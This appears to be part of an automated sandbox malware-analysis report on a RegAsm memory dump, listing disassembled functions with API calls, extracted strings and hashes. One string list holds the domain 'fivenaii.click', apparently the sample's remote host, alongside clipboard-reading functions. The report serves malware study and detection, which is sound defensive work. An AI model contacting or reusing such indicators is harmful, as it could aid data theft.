                                                                                                • Instruction Fuzzy Hash: 29F0A0FEE805528FDB04CF55EC5446533A3B7D930631D8479D501A3229DE74A902DA45
                                                                                                Function 0043C570 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 83 43c570-43c57c 84 43c583-43c584 83->84 85 43c585-43c597 call 43f990 RtlFreeHeap 83->85
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,0043E0F9), ref: 0043C590
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: 4ca71c55d9fe9b281f7981d367328e1df5632f63ab8c1559b6560bf0dd0d3b5a
                                                                                                • Instruction ID: b893ccae00c0100e086c015fd95e4a651a52546402759b79cf5975c20580b1f3
                                                                                                • Opcode Fuzzy Hash: 4ca71c55d9fe9b281f7981d367328e1df5632f63ab8c1559b6560bf0dd0d3b5a
                                                                                                • Instruction Fuzzy Hash: 28D01231815232FBC6102F28BC05BCB3B54DF5A321F0708A2F404AB075C764EC91DAD8
                                                                                                Function 0043C55B Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 89 43c55b-43c568 RtlAllocateHeap
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043C561
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 1e4e484f05b9e0d440bcaef072417b378b3908eb1398e6cf47b9ef0a4f9b27b4
                                                                                                • Instruction ID: acefbe7e0d7c30d89c71afa01d78d71c03f6ee103d6cd382e15fa3716b8bb47b
                                                                                                • Opcode Fuzzy Hash: 1e4e484f05b9e0d440bcaef072417b378b3908eb1398e6cf47b9ef0a4f9b27b4
                                                                                                • Instruction Fuzzy Hash: 13A012310401109AC5111B10BC08FC53E10DB05221F020051F000040B28260C841C584
                                                                                                Function 0040DDBB Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: Uninitialize
                                                                                                • String ID:
                                                                                                • API String ID: 3861434553-0
                                                                                                • Opcode ID: 0a614a96431d9d701f40230e0772b67ec7475a12848427324b9a6d407e3c9b36
                                                                                                • Instruction ID: 5bb00a4b7ef97e9f22d5c03d32b859c0f98b2e4320e2e689d4767ab94f51e1d5
                                                                                                • Opcode Fuzzy Hash: 0a614a96431d9d701f40230e0772b67ec7475a12848427324b9a6d407e3c9b36
                                                                                                • Instruction Fuzzy Hash: BBC0807C61C0018BC708D731EC2643732569F8B34D724443ED40785357DB7465114A4D

                                                                                                Non-executed Functions

                                                                                                Function 00422E6D Relevance: 50.5, APIs: 3, Strings: 25, Instructions: 1504COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "7B$%"$+A#C=]=_$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$fivenaii.click$g}zh$p7B$s$wdnf$~SS}$rp
                                                                                                • API String ID: 0-3565097191
                                                                                                • Opcode ID: e7edffdd5fd14d72b39b69682efa331384b3f5ec70a2e9e708273cc4b8c2f64b
                                                                                                • Instruction ID: c461727374bb2b2ad86d2c2bcda0cf258ef6ef710b96b519a2ac6f34890c1cf1
                                                                                                • Opcode Fuzzy Hash: e7edffdd5fd14d72b39b69682efa331384b3f5ec70a2e9e708273cc4b8c2f64b
                                                                                                • Instruction Fuzzy Hash: 4CB241B5A08311CFD714CF29D8816ABBBF2FF86310F19856DE4859B391D7389902CB96
                                                                                                Function 00433E30 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116clipboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                • String ID: '$($*$-$5$6$8$;$=$I$L$q$}
                                                                                                • API String ID: 2832541153-2064290267
                                                                                                • Opcode ID: e5da5b9a56329a51e64cc872523e0dfe2627c190021f4751e0eab4ab2fc29bc9
                                                                                                • Instruction ID: e1340490ca777862a7890bfc042d0e04e3e37fcf4304b8f7f5516f793469ed24
                                                                                                • Opcode Fuzzy Hash: e5da5b9a56329a51e64cc872523e0dfe2627c190021f4751e0eab4ab2fc29bc9
                                                                                                • Instruction Fuzzy Hash: E0417FB150C3818ED301AF78958835EFEE0AB89319F04497EE4C987292D7BD8689C757
                                                                                                Function 004239B9 Relevance: 18.3, APIs: 3, Strings: 7, Instructions: 821COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ":B$+A#C=]=_$=]=_$_^]\$eN$p7B$rp
                                                                                                • API String ID: 0-2092896893
                                                                                                • Opcode ID: ed0750c71e1987e5a6d7bbb2feff7f6cba7481729a1a1e0e14759066178fedbc
                                                                                                • Instruction ID: 182eaf4e6841349a8ef13573fe29d1f0c1c004a6e50f6283d231cbe69a191b93
                                                                                                • Opcode Fuzzy Hash: ed0750c71e1987e5a6d7bbb2feff7f6cba7481729a1a1e0e14759066178fedbc
                                                                                                • Instruction Fuzzy Hash: 594267B5B04211CFD714CF28D8816AABBB2FF8A311F1A81BDD4459B395D738D942CB85
                                                                                                Function 00411D2B Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 479COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL ref: 00411EC3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: 8$?$L$[$^$a$p$y$|
                                                                                                • API String ID: 237503144-3949209405
                                                                                                • Opcode ID: 4a8879f59250b1b40dd97a34ff5c93777886415510556bea7e1a63f8662ddf82
                                                                                                • Instruction ID: f3e99263922766072051b57ffb7fb6feee41006b6636dbb619e47a4599fab130
                                                                                                • Opcode Fuzzy Hash: 4a8879f59250b1b40dd97a34ff5c93777886415510556bea7e1a63f8662ddf82
                                                                                                • Instruction Fuzzy Hash: 3512A17160C7808BC324DB38C5913EFBBE1AF85314F184A2EE9D9D7392D67898858B47
                                                                                                Function 00427740 Relevance: 16.6, Strings: 13, Instructions: 338COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !A/C$$Y)[$1Q>S$DE$O=q?$P-X/$S%g'$Z)o+$f!V#$r$s1z3$}5x7$}9F;
                                                                                                • API String ID: 0-3413813421
                                                                                                • Opcode ID: 458a8bf2b899d5374d71cf77dcf3c349152665624c54811c7463cc9c4c7509d7
                                                                                                • Instruction ID: 5d18dcd57d5afae5d2d04a22ff7efa295b4e1cb49f3d19f2d9ec184adb64bcbb
                                                                                                • Opcode Fuzzy Hash: 458a8bf2b899d5374d71cf77dcf3c349152665624c54811c7463cc9c4c7509d7
                                                                                                • Instruction Fuzzy Hash: FBC1DFB460C3418FE724DF25D85176BBBF1EF81304F05496DE5998B3A2D7388906CB9A
                                                                                                Function 0041C8A0 Relevance: 15.6, Strings: 12, Instructions: 585COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "nl$#M%O$*"$4UW$\701$\701$a`|v$wt$AC$MO$pv$uvw
                                                                                                • API String ID: 0-635595044
                                                                                                • Opcode ID: 667693208df0268b9ec092dcfe9b45baca584c7d5a41cd89dd0410bc245c86b8
                                                                                                • Instruction ID: cacfe30d0b9b21159c86ccf72fc2d8f2746876e9854ab90a0990479cac9f29fc
                                                                                                • Opcode Fuzzy Hash: 667693208df0268b9ec092dcfe9b45baca584c7d5a41cd89dd0410bc245c86b8
                                                                                                • Instruction Fuzzy Hash: 8902F3B594C3008BC7049F29D8916ABBBF1EFD2314F15892DF4C59B351E238DA49C79A
                                                                                                Function 0041EB80 Relevance: 12.1, Strings: 9, Instructions: 812COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AL$CPm5$O}nl$Yxqs$f>mI$hch&$t|f$uvqs$
                                                                                                • API String ID: 0-1556426300
                                                                                                • Opcode ID: 735fdd800c882bc2084322a437c9c924766bb235598593207dd1441ed3ed4d6f
                                                                                                • Instruction ID: 72dbec98d39b44e021400b4b3f7dd457a245ac0fe219d5a174d4001ed2214f73
                                                                                                • Opcode Fuzzy Hash: 735fdd800c882bc2084322a437c9c924766bb235598593207dd1441ed3ed4d6f
                                                                                                • Instruction Fuzzy Hash: 0252467050C3918FC721CF25C8406AFBBE1AF95314F144A7EE8E45B392D739994ACB9A
                                                                                                Function 0042B980 Relevance: 10.3, Strings: 8, Instructions: 329COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 47:$ " $220$AZDH$UXWZ$nV[k$pMC@$:/'
                                                                                                • API String ID: 0-3711047884
                                                                                                • Opcode ID: a4c9283d45bc98dcba5f61ed0453037d099fbeaad371f82cb7e9938c9b68f646
                                                                                                • Instruction ID: 65e572282dc53975798f39d0df5fbe4ea82dc72bdd677536ff169635eb849b4a
                                                                                                • Opcode Fuzzy Hash: a4c9283d45bc98dcba5f61ed0453037d099fbeaad371f82cb7e9938c9b68f646
                                                                                                • Instruction Fuzzy Hash: 46C169B4904B819FD320AF3A95467A3BFF0EB06300F444A5ED4EA4B795E735601ACBD6
                                                                                                Function 0041747D Relevance: 10.0, APIs: 4, Strings: 1, Instructions: 1238COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _^]\
                                                                                                • API String ID: 0-3116432788
                                                                                                • Opcode ID: b96ce21cf214a16ae07447a79efeb4cc0916feeea9f87c928e3a685268b8bebc
                                                                                                • Instruction ID: 53d5d62a5b06f007e29734ec6a967500c823bb8f017ec32fffb38b320ea18f22
                                                                                                • Opcode Fuzzy Hash: b96ce21cf214a16ae07447a79efeb4cc0916feeea9f87c928e3a685268b8bebc
                                                                                                • Instruction Fuzzy Hash: CC8234715083518BC724CF28C8917ABB7F1EFCA324F198A6DE8D5973A5E7388845C746
                                                                                                Function 00426D2E Relevance: 8.0, Strings: 6, Instructions: 482COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _^]\_^]\$rqB$uYD\$PV$X^$\R
                                                                                                • API String ID: 0-1627709806
                                                                                                • Opcode ID: 3df9218c4e884d0bc4ea657edaa843c97e8fa3da6c91276e4a67d9cf42d70f5f
                                                                                                • Instruction ID: 5825545f21314853fe0769d62852bd8f916bf307171877822417e4e5256747d8
                                                                                                • Opcode Fuzzy Hash: 3df9218c4e884d0bc4ea657edaa843c97e8fa3da6c91276e4a67d9cf42d70f5f
                                                                                                • Instruction Fuzzy Hash: 42F1EEB5E04318CFDB14CFA9D8816AEBBB1FF49304F18446DD642AB351D779A902CB98
                                                                                                Function 0040AB40 Relevance: 8.0, Strings: 6, Instructions: 481COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >$HYZF$HYZF$UMAG$Y2^0$]><
                                                                                                • API String ID: 0-2666672646
                                                                                                • Opcode ID: 32375935e6ef412caa3837e9f6c66e3b8adf22c54bae03c550ad84a2513a055e
                                                                                                • Instruction ID: 560480d45fa7c8791f5dd325a32e0fd9eca2933a49feb221361dc50e24506aec
                                                                                                • Opcode Fuzzy Hash: 32375935e6ef412caa3837e9f6c66e3b8adf22c54bae03c550ad84a2513a055e
                                                                                                • Instruction Fuzzy Hash: 38E12A7674C7504BD324CF6888512AFBBE2DFC1304F18893EE5E5AB385DA798905878A
                                                                                                Function 004281CC Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 593COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004284BD
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004285B4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: LF7Y$_^]\
                                                                                                • API String ID: 237503144-3688711800
                                                                                                • Opcode ID: 26de5ca542a2a6977b9e84e77be44b5ac01a7d5cb18c837ff72e8e2a41646e8e
                                                                                                • Instruction ID: 00d2ad6f27f0b0783341daf9d6c4bd9e01a02a9b0560c8c7bc353a94b2bfb0e2
                                                                                                • Opcode Fuzzy Hash: 26de5ca542a2a6977b9e84e77be44b5ac01a7d5cb18c837ff72e8e2a41646e8e
                                                                                                • Instruction Fuzzy Hash: 90221375A08351CFD3248F28E88072FB7E1BF8A310F194A7DE995673A1D7349912CB5A
                                                                                                Function 004283D8 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 542COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004284BD
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004285B4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: LF7Y$_^]\
                                                                                                • API String ID: 237503144-3688711800
                                                                                                • Opcode ID: d13f070fd010028f18266c39e4bf0995e2ea579b86d440724d5feb7531688b93
                                                                                                • Instruction ID: 9e148bf222026bc2ff09e9b78a5b6d6e6f400f6959469ba780e6b53d717f86de
                                                                                                • Opcode Fuzzy Hash: d13f070fd010028f18266c39e4bf0995e2ea579b86d440724d5feb7531688b93
                                                                                                • Instruction Fuzzy Hash: F812F175A08351CFD3248F28E88071FBBE1BF8A310F194A6DE995673A1D734D942CB5A
                                                                                                Function 0043CDF0 Relevance: 6.9, Strings: 5, Instructions: 697COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: _^]\$_^]\$f$fiP$jiP
                                                                                                • API String ID: 2994545307-2734853458
                                                                                                • Opcode ID: 02867def88f330cc357aa33e98f5089401e16d469949ca3e2fbae4f2ba5b0f1e
                                                                                                • Instruction ID: 745ca490046a6ac68c59f9825e457d0a566b3cc6b4523f93947a3945e487c19a
                                                                                                • Opcode Fuzzy Hash: 02867def88f330cc357aa33e98f5089401e16d469949ca3e2fbae4f2ba5b0f1e
                                                                                                • Instruction Fuzzy Hash: 972213B1A0C3029FD718CF29D89072FBBE2ABD9314F189A2DE4D597395D634DC418B4A
                                                                                                Function 00418169 Relevance: 6.5, Strings: 5, Instructions: 299COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 2h?n$7$SP$^`/4$gfff
                                                                                                • API String ID: 0-3257051659
                                                                                                • Opcode ID: e0427b1a9b77ff7e65e449d5ce122ac57cd39ae6c2270757774d7d10ffd74788
                                                                                                • Instruction ID: 27920faaac780ccf3f5efe4f99c0b1a63c78e90bde3d2871b705a1280bebe65e
                                                                                                • Opcode Fuzzy Hash: e0427b1a9b77ff7e65e449d5ce122ac57cd39ae6c2270757774d7d10ffd74788
                                                                                                • Instruction Fuzzy Hash: 59A14876A143504BD314CF28C8517AFB7E2FBC5318F198A3EE895D7391EA3889428786
                                                                                                Function 004291AE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 004291DA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: +Ku$wpq
                                                                                                • API String ID: 237503144-1953850642
                                                                                                • Opcode ID: dd00e6cff4bb86df55339bea6a97020402cd2a79317d379f18720dc196f8341f
                                                                                                • Instruction ID: 7bb714cd0adbe8f34d65affdf2b55708b4274e5c8486b9e210027d19f02d6b7d
                                                                                                • Opcode Fuzzy Hash: dd00e6cff4bb86df55339bea6a97020402cd2a79317d379f18720dc196f8341f
                                                                                                • Instruction Fuzzy Hash: 6F51CE7220C3528FC324CF29984076FB7E2EBC5310F55892EE5D9CB285DB34D50A8B96
                                                                                                Function 004348C2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem
                                                                                                • String ID:
                                                                                                • API String ID: 4116985748-3916222277
                                                                                                • Opcode ID: e2dbdaae214771375078ea694cbe3190168a6d9690373aa5dbc97004a2b0131a
                                                                                                • Instruction ID: fc399c5893f09ab22ce38e0ca23dce90b2d9510c132352c7ff6b67ebebce5796
                                                                                                • Opcode Fuzzy Hash: e2dbdaae214771375078ea694cbe3190168a6d9690373aa5dbc97004a2b0131a
                                                                                                • Instruction Fuzzy Hash: 725160B4E142089FCB40EFACD98569DBBF0AB48710F11852EE898E7350D734A944CF96
                                                                                                Function 004290D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00429170
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: M/($M/(
                                                                                                • API String ID: 237503144-1710806632
                                                                                                • Opcode ID: ff58c78b0b27bbba40667f193cd225ec620092edf491b3be0aa44738014710da
                                                                                                • Instruction ID: a6fe4633539d009e024b46cdafe5f934a4e6010abeff1ae95be2d2e31fad33eb
                                                                                                • Opcode Fuzzy Hash: ff58c78b0b27bbba40667f193cd225ec620092edf491b3be0aa44738014710da
                                                                                                • Instruction Fuzzy Hash: 9E21017165C3615BE714CE34A88579BB7AAEBC2700F01892CA0D1AB2C5D679880B8756
                                                                                                Function 0042A5B6 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: VN$VN$i$i
                                                                                                • API String ID: 0-1885346908
                                                                                                • Opcode ID: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                • Instruction ID: 20de38ffdec1ef662448aae0f94b74d237ba66483fbda11b24aa8be7d4a8abcc
                                                                                                • Opcode Fuzzy Hash: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                • Instruction Fuzzy Hash: B721F6212083918BD3058E6590402A7BBE3AFC6318F684A5FD8F15B395E63BC94A875B
                                                                                                Function 00414CA0 Relevance: 4.8, Strings: 3, Instructions: 1046COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 7UA$D]+\$_^]\
                                                                                                • API String ID: 0-3619184598
                                                                                                • Opcode ID: 2e0cd4d93215bffa60c50a2cc29c154bb915ce2da521f1faa8d3ae08ee25634b
                                                                                                • Instruction ID: 9cee455d72e7dd9915cda87ad3665199875abe0b71a1f7719e3c07a7155446ef
                                                                                                • Opcode Fuzzy Hash: 2e0cd4d93215bffa60c50a2cc29c154bb915ce2da521f1faa8d3ae08ee25634b
                                                                                                • Instruction Fuzzy Hash: E4524474608300DBE704DF28EC527BBB3A1FB86314F19493DE586973A1E7399981CB5A
                                                                                                Function 00440D20 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: @Ukx$
                                                                                                • API String ID: 2994545307-3636270652
                                                                                                • Opcode ID: 68fd1405b344facc4b0026b9fe161e78bdc877d3fcaeb6f8274981348c185207
                                                                                                • Instruction ID: 03a383fb22d51b403848371ba2a4540fe2b40c56cab5129fcdd4839ce92f9fe8
                                                                                                • Opcode Fuzzy Hash: 68fd1405b344facc4b0026b9fe161e78bdc877d3fcaeb6f8274981348c185207
                                                                                                • Instruction Fuzzy Hash: DDB17833B083104BE728CE28DCD22BBB792EBC5314F19C93DDA9657395DA399C458786
                                                                                                Function 00409780 Relevance: 2.9, Strings: 2, Instructions: 420COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 1$A
                                                                                                • API String ID: 0-719046165
                                                                                                • Opcode ID: bd1ee34c9fa08e29029345848de4dd2afdd75f18fa78b65bf56a6416e37b6555
                                                                                                • Instruction ID: e807b6bde7ca49dc404e07dafbff5fc9189e5662c362ff5d9520ac40bf6a6c7c
                                                                                                • Opcode Fuzzy Hash: bd1ee34c9fa08e29029345848de4dd2afdd75f18fa78b65bf56a6416e37b6555
                                                                                                • Instruction Fuzzy Hash: 41D1E4B55083508BD718DF24C8517ABBBE1FFC5318F08896DE4D99B382DB389906CB96
                                                                                                Function 00422830 Relevance: 2.9, Strings: 2, Instructions: 411COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C@$_^]\
                                                                                                • API String ID: 0-1259475386
                                                                                                • Opcode ID: e06a379b46e52741ffd7a8eb9d43fc02087815218cdea83b303c67149d7ce589
                                                                                                • Instruction ID: 97f681d162b0ce7800c7d58e7d4b110804466645679b58dd264a8ebd8314ce09
                                                                                                • Opcode Fuzzy Hash: e06a379b46e52741ffd7a8eb9d43fc02087815218cdea83b303c67149d7ce589
                                                                                                • Instruction Fuzzy Hash: A2B149A1B083206BD714DF25995273BB3F1EFD1324F59892EE88697381E27CE941835A
